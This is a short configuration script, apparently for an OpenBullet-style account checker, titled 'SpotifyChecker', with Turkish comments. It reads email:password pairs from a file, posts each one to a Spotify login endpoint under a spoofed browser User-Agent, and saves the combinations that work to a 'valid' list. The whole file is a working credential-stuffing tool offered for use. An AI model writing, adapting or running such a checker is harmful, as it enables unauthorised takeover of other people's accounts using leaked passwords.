[SETTINGS]
NAME=SpotifyChecker
AUTHOR=YourName
VERSION=1.0
DESCRIPTION=Spotify hesap kontrolü.

[VARIABLES]
inputFile=accounts.txt
validFile=valid_accounts.txt
invalidFile=invalid_accounts.txt

[DATA]
# Input dosyası, hesapları mail:şifre formatında içermelidir.
FILE=inputFile

[BLOCKS]
# Ana kontrol bloğu
BLOCK MAIN
TYPE=MAIN
CODE
    # Dosyadan bir hesap al
    SET account = READLINE inputFile
    IF EMPTY account
        LOG "Kontrol edilecek hesap kalmadı, işlem tamamlandı."
        STOP
    ENDIF

    # Hesabı ayır
    SPLIT account : VAR email VAR password
    LOG "Kontrol ediliyor: {email}:{password}"

    # Spotify API'sine POST isteği gönder
    HTTP POST "https://accounts.spotify.com/api/login"
    POSTDATA "username={email}&password={password}"
    HEADER "Content-Type: application/x-www-form-urlencoded"
    HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
    SAVE RESPONSE response

    # Yanıtı analiz et
    IF CONTAINS response "displayName"
        LOG "✅ Geçerli Hesap: {email}:{password}"
        APPENDLINE validFile "{email}:{password}"
    ELSEIF CONTAINS response "error"
        LOG "⛔ Geçersiz Hesap: {email}:{password}"
        APPENDLINE invalidFile "{email}:{password}"
    ELSE
        LOG "⚠️ Beklenmeyen Durum: {response}"
    ENDIF

    # Bir sonraki hesaba geç
    GOTO MAIN
END
